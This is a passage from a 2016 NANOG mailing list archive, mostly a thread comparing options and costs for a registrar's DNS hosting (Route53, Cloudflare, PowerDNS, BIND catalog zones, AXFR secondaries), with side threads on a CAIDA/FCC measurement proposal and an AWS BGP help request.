return. On Fri, 12 Aug 2016, Keith Stokes wrote: > Route53 can get expensive for lots of domains. Queries are cheap with the > first 1M free, but if you have 1000 domains you?ll pay $500/month. > > You can build dedicated servers in multiple AZs and data centers able to > handle that many domains for far less. > > You might also consider running dedicated servers in each of AWS and > Azure to avoid a single-provider failure. Having worked for AWS, there is no "global" control plane that would bring two regions down at the same time. While possible, due to say a targeted successful attack on both regions simultaneously, highly unlikely. Control and data plane software updates and deployments are done regionally, and often on an Availability Zone basis where applicable, to ensure there are no defects. Automation measures and will automatically roll back code that breaks deployment metrics. It's pretty sweet. Their internal tools team does amazing things with automation. Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10 per month per zone after that. 1000 domains would be $110 a month, not $500. 500 million queries at $0.40 per million, another $200/month. Who knows if you need that much, but it is pretty affordable. Beckman --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- From sean at donelan.com Fri Aug 12 19:28:23 2016 From: sean at donelan.com (Sean Donelan) Date: Fri, 12 Aug 2016 15:28:23 -0400 (EDT) Subject: CAIDA selected by FCC for internet performance measurement Message-ID: CAIDA has submitted to the FCC its initial proposal for measuring internet interconnection point performance metrics as part of the AT&T/DirecTV merger conditions. http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf From justin at cloudflare.com Fri Aug 12 20:11:20 2016 From: justin at cloudflare.com (Justin Paine) Date: Fri, 12 Aug 2016 13:11:20 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: I won't push further than this -- but it seems a bit silly not to mention that CloudFlare provides free AnyCast DNS. You can elect not to even use any of our caching if you just want to use us for DNS. J ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman wrote: > If there are other metrics in which to measure DNS speed, availability and > redundancy, I'd love to seeing them. I have but my own datapoint and the > metrics from others. Tear down the testing model, but at least show a > different/better one in return. > > On Fri, 12 Aug 2016, Keith Stokes wrote: > >> Route53 can get expensive for lots of domains. Queries are cheap with the >> first 1M free, but if you have 1000 domains you?ll pay $500/month. >> >> You can build dedicated servers in multiple AZs and data centers able to >> handle that many domains for far less. >> >> You might also consider running dedicated servers in each of AWS and >> Azure to avoid a single-provider failure. > > > Having worked for AWS, there is no "global" control plane that would bring > two regions down at the same time. While possible, due to say a targeted > successful attack on both regions simultaneously, highly unlikely. Control > and data plane software updates and deployments are done regionally, and > often on an Availability Zone basis where applicable, to ensure there are > no defects. Automation measures and will automatically roll back code that > breaks deployment metrics. > > It's pretty sweet. Their internal tools team does amazing things with > automation. > > Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10 > per month per zone after that. 1000 domains would be $110 a month, not > $500. 500 million queries at $0.40 per million, another $200/month. > > Who knows if you need that much, but it is pretty affordable. > > Beckman > --------------------------------------------------------------------------- > Peter Beckman Internet Guy > beckman at angryox.com http://www.angryox.com/ > --------------------------------------------------------------------------- From fhr at fhrnet.eu Fri Aug 12 20:17:16 2016 From: fhr at fhrnet.eu (Filip Hruska) Date: Fri, 12 Aug 2016 22:17:16 +0200 Subject: DNS Services for a registrar In-Reply-To: References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu> Even for registrars? Because OP's question was > We need to provide DNS services for domains we offer as a registrar. Best Regards, Filip On 12.8.2016 22:11, Justin Paine via NANOG wrote: > I won't push further than this -- but it seems a bit silly not to > mention that CloudFlare provides free AnyCast DNS. You can elect not > to even use any of our caching if you just want to use us for DNS. > > J > > ____________ > Justin Paine > Head of Trust & Safety > CloudFlare Inc. > PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D > > > On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman wrote: >> If there are other metrics in which to measure DNS speed, availability and >> redundancy, I'd love to seeing them. I have but my own datapoint and the >> metrics from others. Tear down the testing model, but at least show a >> different/better one in return. >> >> On Fri, 12 Aug 2016, Keith Stokes wrote: >> >>> Route53 can get expensive for lots of domains. Queries are cheap with the >>> first 1M free, but if you have 1000 domains you?ll pay $500/month. >>> >>> You can build dedicated servers in multiple AZs and data centers able to >>> handle that many domains for far less. >>> >>> You might also consider running dedicated servers in each of AWS and >>> Azure to avoid a single-provider failure. >> >> >> Having worked for AWS, there is no "global" control plane that would bring >> two regions down at the same time. While possible, due to say a targeted >> successful attack on both regions simultaneously, highly unlikely. Control >> and data plane software updates and deployments are done regionally, and >> often on an Availability Zone basis where applicable, to ensure there are >> no defects. Automation measures and will automatically roll back code that >> breaks deployment metrics. >> >> It's pretty sweet. Their internal tools team does amazing things with >> automation. >> >> Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10 >> per month per zone after that. 1000 domains would be $110 a month, not >> $500. 500 million queries at $0.40 per million, another $200/month. >> >> Who knows if you need that much, but it is pretty affordable. >> >> Beckman >> --------------------------------------------------------------------------- >> Peter Beckman Internet Guy >> beckman at angryox.com http://www.angryox.com/ >> --------------------------------------------------------------------------- > From justin at cloudflare.com Fri Aug 12 20:24:52 2016 From: justin at cloudflare.com (Justin Paine) Date: Fri, 12 Aug 2016 13:24:52 -0700 Subject: DNS Services for a registrar In-Reply-To: <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu> Message-ID: Right -- we could do it, though it would be a first for us. ____________ Justin Paine Head of Trust & Safety CloudFlare Inc. PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D On Fri, Aug 12, 2016 at 1:17 PM, Filip Hruska wrote: > Even for registrars? > > Because OP's question was > > We need to provide DNS services for domains we offer as a registrar. > > Best Regards, > Filip > > > On 12.8.2016 22:11, Justin Paine via NANOG wrote: > >> I won't push further than this -- but it seems a bit silly not to >> mention that CloudFlare provides free AnyCast DNS. You can elect not >> to even use any of our caching if you just want to use us for DNS. >> >> J >> >> ____________ >> Justin Paine >> Head of Trust & Safety >> CloudFlare Inc. >> PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D >> >> >> On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman >> wrote: >> >>> If there are other metrics in which to measure DNS speed, availability >>> and >>> redundancy, I'd love to seeing them. I have but my own datapoint and the >>> metrics from others. Tear down the testing model, but at least show a >>> different/better one in return. >>> >>> On Fri, 12 Aug 2016, Keith Stokes wrote: >>> >>> Route53 can get expensive for lots of domains. Queries are cheap with the >>>> first 1M free, but if you have 1000 domains you?ll pay $500/month. >>>> >>>> You can build dedicated servers in multiple AZs and data centers able to >>>> handle that many domains for far less. >>>> >>>> You might also consider running dedicated servers in each of AWS and >>>> Azure to avoid a single-provider failure. >>>> >>> >>> >>> Having worked for AWS, there is no "global" control plane that would >>> bring >>> two regions down at the same time. While possible, due to say a targeted >>> successful attack on both regions simultaneously, highly unlikely. >>> Control >>> and data plane software updates and deployments are done regionally, and >>> often on an Availability Zone basis where applicable, to ensure there are >>> no defects. Automation measures and will automatically roll back code >>> that >>> breaks deployment metrics. >>> >>> It's pretty sweet. Their internal tools team does amazing things with >>> automation. >>> >>> Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then >>> $0.10 >>> per month per zone after that. 1000 domains would be $110 a month, not >>> $500. 500 million queries at $0.40 per million, another $200/month. >>> >>> Who knows if you need that much, but it is pretty affordable. >>> >>> Beckman >>> ------------------------------------------------------------ >>> --------------- >>> Peter Beckman Internet >>> Guy >>> beckman at angryox.com >>> http://www.angryox.com/ >>> ------------------------------------------------------------ >>> --------------- >>> >> >> From surfer at mauigateway.com Fri Aug 12 20:41:53 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 13:41:53 -0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812134153.79A62684@m0087792.ppops.net> --- sean at donelan.com wrote: From: Sean Donelan CAIDA has submitted to the FCC its initial proposal for measuring internet interconnection point performance metrics as part of the AT&T/DirecTV merger conditions. http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf ------------------------------------------------- I don't seem to be able to get the pdf referred to in the above link to open correctly. https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF Anyone else get it to open? I want to find out about the methodology. scott From keiths at neilltech.com Fri Aug 12 20:49:15 2016 From: keiths at neilltech.com (Keith Stokes) Date: Fri, 12 Aug 2016 20:49:15 +0000 Subject: DNS Services for a registrar In-Reply-To: References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: <9EBC4F50-4CE0-42F2-A874-6CB874D771F5@neilltech.com> Never say ?never?. ;-) Notice I did not say ?you must? or ?you should?. It is something to consider based on how many 9s are important to your business. The job of many of us is to think of those things that are highly unlikely, assign a risk and make a plan (or not) accordingly. The likely ones are written down and ?anyone? can follow them. In this case I?d say the risk is higher that someone puts the wrong info into a DNS change and if they are in different services and not automatically replicated, you could be better off. Again, what are the risks to your business? On Aug 12, 2016, at 2:24 PM, Peter Beckman > wrote: If there are other metrics in which to measure DNS speed, availability and redundancy, I'd love to seeing them. I have but my own datapoint and the metrics from others. Tear down the testing model, but at least show a different/better one in return. On Fri, 12 Aug 2016, Keith Stokes wrote: Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you?ll pay $500/month. You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. You might also consider running dedicated servers in each of AWS and Azure to avoid a single-provider failure. Having worked for AWS, there is no "global" control plane that would bring two regions down at the same time. While possible, due to say a targeted successful attack on both regions simultaneously, highly unlikely. Control and data plane software updates and deployments are done regionally, and often on an Availability Zone basis where applicable, to ensure there are no defects. Automation measures and will automatically roll back code that breaks deployment metrics. It's pretty sweet. Their internal tools team does amazing things with automation. Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10 per month per zone after that. 1000 domains would be $110 a month, not $500. 500 million queries at $0.40 per million, another $200/month. Who knows if you need that much, but it is pretty affordable. Beckman --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- --- Keith Stokes From morrowc.lists at gmail.com Fri Aug 12 20:50:00 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Fri, 12 Aug 2016 16:50:00 -0400 Subject: CAIDA selected by FCC for internet performance measurement In-Reply-To: <20160812134153.79A62684@m0087792.ppops.net> References: <20160812134153.79A62684@m0087792.ppops.net> Message-ID: isn't this what KC presented like 3 nanogs ago? On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote: > > > --- sean at donelan.com wrote: > From: Sean Donelan > > CAIDA has submitted to the FCC its initial proposal for > measuring internet interconnection point performance > metrics as part of the AT&T/DirecTV merger conditions. > > http://transition.fcc.gov/Daily_Releases/Daily_Business/ > 2016/db0812/DA-16-909A1.pdf > ------------------------------------------------- > > > I don't seem to be able to get the pdf referred to in the > above link to open correctly. > > https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014- > 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF > > Anyone else get it to open? I want to find out about > the methodology. > > scott > > > From joelja at bogus.com Fri Aug 12 20:50:49 2016 From: joelja at bogus.com (joel jaeggli) Date: Fri, 12 Aug 2016 13:50:49 -0700 Subject: CAIDA selected by FCC for internet performance measurement In-Reply-To: <20160812134153.79A62684@m0087792.ppops.net> References: <20160812134153.79A62684@m0087792.ppops.net> Message-ID: On 8/12/16 1:41 PM, Scott Weeks wrote: > > --- sean at donelan.com wrote: > From: Sean Donelan > > CAIDA has submitted to the FCC its initial proposal for > measuring internet interconnection point performance > metrics as part of the AT&T/DirecTV merger conditions. > > http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf > ------------------------------------------------- > > > I don't seem to be able to get the pdf referred to in the > above link to open correctly. > > https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF opens fine in chrome created by Aspose.Pdf for .NET 10.2.0 > Anyone else get it to open? I want to find out about > the methodology. > > scott > > From surfer at mauigateway.com Fri Aug 12 20:59:45 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 13:59:45 -0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812135945.79A62091@m0087792.ppops.net> On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote: > --- sean at donelan.com wrote: > From: Sean Donelan > > CAIDA has submitted to the FCC its initial proposal for > measuring internet interconnection point performance > metrics as part of the AT&T/DirecTV merger conditions. > > http://transition.fcc.gov/Daily_Releases/Daily_Business/ > 2016/db0812/DA-16-909A1.pdf > ------------------------------------------------- > > > I don't seem to be able to get the pdf referred to in the > above link to open correctly. > > https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014- > 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF > > Anyone else get it to open? I want to find out about > the methodology. ------------------------------------------------- On the 5th download I finally got something more than zero bytes. Maybe they don't like Linux? >;-) --- morrowc.lists at gmail.com wrote: From: Christopher Morrow isn't this what KC presented like 3 nanogs ago? ----------------------------------------------- Thanks and I will look that up. scott From bob at FiberInternetCenter.com Fri Aug 12 21:23:25 2016 From: bob at FiberInternetCenter.com (Bob Evans) Date: Fri, 12 Aug 2016 14:23:25 -0700 Subject: Amazon BGP engineer for AWS router help. Message-ID: <4fb1dd438f87c3260f85c7149e0ac85b.squirrel@66.201.44.180> I have a customer working for an Amazon department/division. Amazon gave this department an AWS connection where we have an AWS cross connect and direct fiber path established. I have the path as well as the customer side BGP router configured and can ping the AWS router. The Amazon department with console access has setup issues and can not bring up BGP. I do not see a single message sent from their AWS virtual BGP router. They won't give me the access to the console to help fix things. They opened a ticket last Saturday and still waiting for AWS staff help. I want to help everyone be successful maybe they will give an Amazon router engineer access to the console. Please contact me via email offline. Thank You Bob Evans CTO From surfer at mauigateway.com Fri Aug 12 21:40:11 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 14:40:11 -0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812144011.79A62D6F@m0087792.ppops.net> On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote: > --- sean at donelan.com wrote: > From: Sean Donelan > > CAIDA has submitted to the FCC its initial proposal for > measuring internet interconnection point performance > metrics as part of the AT&T/DirecTV merger conditions. > > http://transition.fcc.gov/Daily_Releases/Daily_Business/ > 2016/db0812/DA-16-909A1.pdf > ------------------------------------------------- > > > I don't seem to be able to get the pdf referred to in the > above link to open correctly. > > https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014- > 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF > > Anyone else get it to open? I want to find out about > the methodology. ------------------------------------------------ --- morrowc.lists at gmail.com wrote: From: Christopher Morrow isn't this what KC presented like 3 nanogs ago? ---------------------------------------------- For the archives: https://www.nanog.org/sites/default/files/caida.pdf Thanks Chris! scott From surfer at mauigateway.com Fri Aug 12 21:58:49 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 14:58:49 -0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812145849.79A62E48@m0087792.ppops.net> --- morrowc.lists at gmail.com wrote: From: Christopher Morrow isn't this what KC presented like 3 nanogs ago? ---------------------------------------------- For the archives: https://www.nanog.org/sites/default/files/caida.pdf ----------------------------------- Sorry, one more email. Better link: http://nanog.org/meetings/nanog66/agenda Tuesday, February 9 2016 2:30pm - 3:30pm Keynote: Internet Measurement Speakers: k claffy, CAIDA David Clark, MIT Geoff Huston, APNIC scott From rubensk at gmail.com Fri Aug 12 22:46:47 2016 From: rubensk at gmail.com (Rubens Kuhl) Date: Fri, 12 Aug 2016 19:46:47 -0300 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > Hi, > > If you are going the IaaS route, definitely checkout KnotDNS project. > According to their benchmarks [1], it does much better than other DNS > servers in about every workload. > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for servers with a small number of zones containing large numbers of records, usually delegation-only. That is the use of TLD registries, but not the use case of registrars... ... all those 3 are getting better in supporting large number of zones with small number of records, but the canonical solution in that space is Power DNS. Things that TLDs usually don't like, SQL-backend for instance, makes perfect sense for this use case. Note that the only workload they tested is serving the root zone, not multiple number of zones with variable number of RR-sets... so aligning the testing with the actual use case is crucial to make good decisions. What I strongly support, though, is getting out of the BIND comfort zone. Rubens From marka at isc.org Fri Aug 12 23:09:23 2016 From: marka at isc.org (Mark Andrews) Date: Sat, 13 Aug 2016 09:09:23 +1000 Subject: DNS Services for a registrar In-Reply-To: Your message of "Fri, 12 Aug 2016 19:46:47 -0300." References: Message-ID: <20160812230923.9EA5150A53A2@rock.dv.isc.org> In message , Rubens Kuhl writes: > On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > > > Hi, > > > > If you are going the IaaS route, definitely checkout KnotDNS project. > > According to their benchmarks [1], it does much better than other DNS > > servers in about every workload. > > > > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for > servers with a small number of zones containing large numbers of records, > usually delegation-only. That is the use of TLD registries, but not the use > case of registrars... > > ... all those 3 are getting better in supporting large number of zones with > small number of records, but the canonical solution in that space is Power > DNS. Things that TLDs usually don't like, SQL-backend for instance, makes > perfect sense for this use case. > > Note that the only workload they tested is serving the root zone, not > multiple number of zones with variable number of RR-sets... so aligning the > testing with the actual use case is crucial to make good decisions. > > What I strongly support, though, is getting out of the BIND comfort zone. Named will support millions of zones and they don't need to be listed in named.conf. BIND 9.11 supports catalog zone which is a meta zone which says what zones the server should configure itself for and where to transfer those zones from, etc. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mehmet at akcin.net Sat Aug 13 02:07:03 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 19:07:03 -0700 Subject: DNS Services for a registrar In-Reply-To: <20160812230923.9EA5150A53A2@rock.dv.isc.org> References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On a serious note, what are the providers out there that can do a decent secondary dns hosting service?. looks like a lot of people stopped offering this service for bulk amount of domains at reasonable price. Let's say (100K domains) mehmet On Fri, Aug 12, 2016 at 4:09 PM, Mark Andrews wrote: > > In message mail.gmail.com> > , Rubens Kuhl writes: > > On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > > > > > Hi, > > > > > > If you are going the IaaS route, definitely checkout KnotDNS project. > > > According to their benchmarks [1], it does much better than other DNS > > > servers in about every workload. > > > > > > > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for > > servers with a small number of zones containing large numbers of records, > > usually delegation-only. That is the use of TLD registries, but not the > use > > case of registrars... > > > > ... all those 3 are getting better in supporting large number of zones > with > > small number of records, but the canonical solution in that space is > Power > > DNS. Things that TLDs usually don't like, SQL-backend for instance, makes > > perfect sense for this use case. > > > > Note that the only workload they tested is serving the root zone, not > > multiple number of zones with variable number of RR-sets... so aligning > the > > testing with the actual use case is crucial to make good decisions. > > > > What I strongly support, though, is getting out of the BIND comfort zone. > > Named will support millions of zones and they don't need to be > listed in named.conf. BIND 9.11 supports catalog zone which is a > meta zone which says what zones the server should configure itself > for and where to transfer those zones from, etc. > > Mark > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From damian at google.com Sat Aug 13 02:58:25 2016 From: damian at google.com (Damian Menscher) Date: Fri, 12 Aug 2016 19:58:25 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin wrote: > On a serious note, what are the providers out there that can do a decent > secondary dns hosting service?. looks like a lot of people stopped offering > this service for bulk amount of domains at reasonable price. Let's say > (100K domains) > What do you consider a reasonable price? As a starting point for discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( https://cloud.google.com/dns/pricing). Damian From cb.list6 at gmail.com Sat Aug 13 03:09:05 2016 From: cb.list6 at gmail.com (Ca By) Date: Fri, 12 Aug 2016 20:09:05 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On Friday, August 12, 2016, Damian Menscher via NANOG wrote: > On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin > wrote: > > > On a serious note, what are the providers out there that can do a decent > > secondary dns hosting service?. looks like a lot of people stopped > offering > > this service for bulk amount of domains at reasonable price. Let's say > > (100K domains) > > > > What do you consider a reasonable price? As a starting point for > discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( > https://cloud.google.com/dns/pricing). > > Damian > But google does not do an axfr based secondary? This is a very important service that Mehmet mentioned. From daknob.mac at gmail.com Fri Aug 12 12:50:55 2016 From: daknob.mac at gmail.com (DaKnOb) Date: Fri, 12 Aug 2016 15:50:55 +0300 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Someone registered the domain ?corp.gr? and now sells subdomains similar to .com.gr, .co.uk, etc. They use a ?clever? way to make sure they will have 100% uptime at virtually no cost: $ dig NS corp.gr ;; Truncated, retrying in TCP mode. ; <<>> DiG 9.8.3-P1 <<>> NS corp.gr ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47495 ;; flags: qr rd ra; QUERY: 1, ANSWER: 28, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;corp.gr. IN NS ;; ANSWER SECTION: corp.gr. 21599 IN NS puck.nether.net. corp.gr. 21599 IN NS ns4.dnsunlimited.com. corp.gr. 21599 IN NS i.ns.buddyns.com. corp.gr. 21599 IN NS d.ns.zerigo.net. corp.gr. 21599 IN NS f.ns.zerigo.net. corp.gr. 21599 IN NS b.nskey.com. corp.gr. 21599 IN NS g.ns.buddyns.com. corp.gr. 21599 IN NS ns4.he.net. corp.gr. 21599 IN NS ns5.dnsunlimited.com. corp.gr. 21599 IN NS f.ns.buddyns.com. corp.gr. 21599 IN NS h.ns.buddyns.com. corp.gr. 21599 IN NS d.ns.buddyns.com. corp.gr. 21599 IN NS ns2.he.net. corp.gr. 21599 IN NS ns2.afraid.org. corp.gr. 21599 IN NS a.nskey.com. corp.gr. 21599 IN NS b.ns.zerigo.net. corp.gr. 21599 IN NS b.ns.buddyns.com. corp.gr. 21599 IN NS e.ns.buddyns.com. corp.gr. 21599 IN NS ns1.dnsunlimited.com. corp.gr. 21599 IN NS c.ns.zerigo.net. corp.gr. 21599 IN NS c.ns.buddyns.com. corp.gr. 21599 IN NS ns3.dnsunlimited.com. corp.gr. 21599 IN NS a.ns.zerigo.net. corp.gr. 21599 IN NS ns5.he.net. corp.gr. 21599 IN NS ns2.dnsunlimited.com. corp.gr. 21599 IN NS ns1.twisted4life.com. corp.gr. 21599 IN NS e.ns.zerigo.net. corp.gr. 21599 IN NS ns3.he.net. ;; Query time: 161 msec ;; SERVER: 8.8.8.8#53(8.8.8.8) ;; WHEN: Fri Aug 12 14:42:58 2016 ;; MSG SIZE rcvd: 577 Of course, I don?t recommend you do this. On a serious note, as mentioned previously, AWS lacks IPv6 currently. A custom solution would provide more control but it may have some challenges. In addition to that, you?d probably need some form of network redundancy but you?re most likely not going to reach AWS? anycasted network?s availability easily. I?d recommend looking to some other providers as well, some of which may be in the list of name servers above.. Just my 2c > On 12 Aug 2016, at 08:56, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > From eli at siliconsprawl.com Fri Aug 12 14:43:21 2016 From: eli at siliconsprawl.com (Eli Lindsey) Date: Fri, 12 Aug 2016 10:43:21 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: >From the speed comparison report: "Averaged across all name servers" That's a silly, synthetic, and non-representative test. It encourages cohosting all your NS at all your sites to game the performance numbers, hurting availability. I'd expect to see a decent amount of latency variance across the NS in a given delegation because I want them to get anycasted to different transit/physical locations, and I would also expect that not to translate into notable user-perceived latency due to resolver's server selection logic. -eli On Fri, Aug 12, 2016 at 9:41 AM, Peter Beckman wrote: > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We >> were discussing internally the different options for the deployment. Does >> anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure >> DNS or AWS Route 53. >> >> Cheers >> Ryan >> >> >> > ------------------------------------------------------------ > --------------- > Peter Beckman Internet Guy > beckman at angryox.com > http://www.angryox.com/ > ------------------------------------------------------------ > --------------- > From daknob.mac at gmail.com Fri Aug 12 15:44:42 2016 From: daknob.mac at gmail.com (DaKnOb) Date: Fri, 12 Aug 2016 18:44:42 +0300 Subject: DNS Services for a registrar In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: > On 12 Aug 2016, at 18:36, Keith Stokes wrote: > > Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you?ll pay $500/month. > > You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. I?d also recommend multiple providers as well if you?re getting dedicated servers so you can avoid non-technical provider-based issues. > > You might also consider running dedicated servers in each of AWS and Azure to avoid a single-provider failure. > > On Aug 12, 2016, at 9:44 AM, John Kinsella > wrote: > > Also a big fan of DNS Made easy, but I wish they?d add DNSSEC already. > > I?m happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month. If you?re worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and > > It might be worth a few minutes pondering just using Amazon?s Route53 instead of running the DNS server yourself. I haven?t looked at how the cost compares. > > On Aug 12, 2016, at 6:41 AM, Peter Beckman > wrote: > > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > > > > --------------------------------------------------------------------------- > Peter Beckman Internet Guy > beckman at angryox.com http://www.angryox.com/ > --------------------------------------------------------------------------- > > > > --- > > Keith Stokes > > > > From matthieu at nxdomain.fr Fri Aug 12 17:34:20 2016 From: matthieu at nxdomain.fr (Matthieu Michaud) Date: Fri, 12 Aug 2016 19:34:20 +0200 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Hi, I have been very happy with route53 while lack of IPv6 support was not an issue for the use case. Did you evaluate CloudFlare in PaaS solution ? Their free plan includes DNS. Best regards, On Fri, Aug 12, 2016 at 7:56 AM, Ryan Finnesey wrote: > We need to provide DNS services for domains we offer as a registrar. We > were discussing internally the different options for the deployment. Does > anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure > DNS or AWS Route 53. > > Cheers > Ryan > > -- Matthieu MICHAUD From mehmet at akcin.net Sat Aug 13 03:12:10 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 20:12:10 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: Good point ;) Yeah axfr would be useful (must have) On Saturday, August 13, 2016, Ca By wrote: > > > On Friday, August 12, 2016, Damian Menscher via NANOG > wrote: > >> On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin wrote: >> >> > On a serious note, what are the providers out there that can do a decent >> > secondary dns hosting service?. looks like a lot of people stopped >> offering >> > this service for bulk amount of domains at reasonable price. Let's say >> > (100K domains) >> > >> >> What do you consider a reasonable price? As a starting point for >> discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( >> https://cloud.google.com/dns/pricing). >> >> Damian >> > > But google does not do an axfr based secondary? > > This is a very important service that Mehmet mentioned. > From jared at puck.Nether.net Sat Aug 13 12:05:11 2016 From: jared 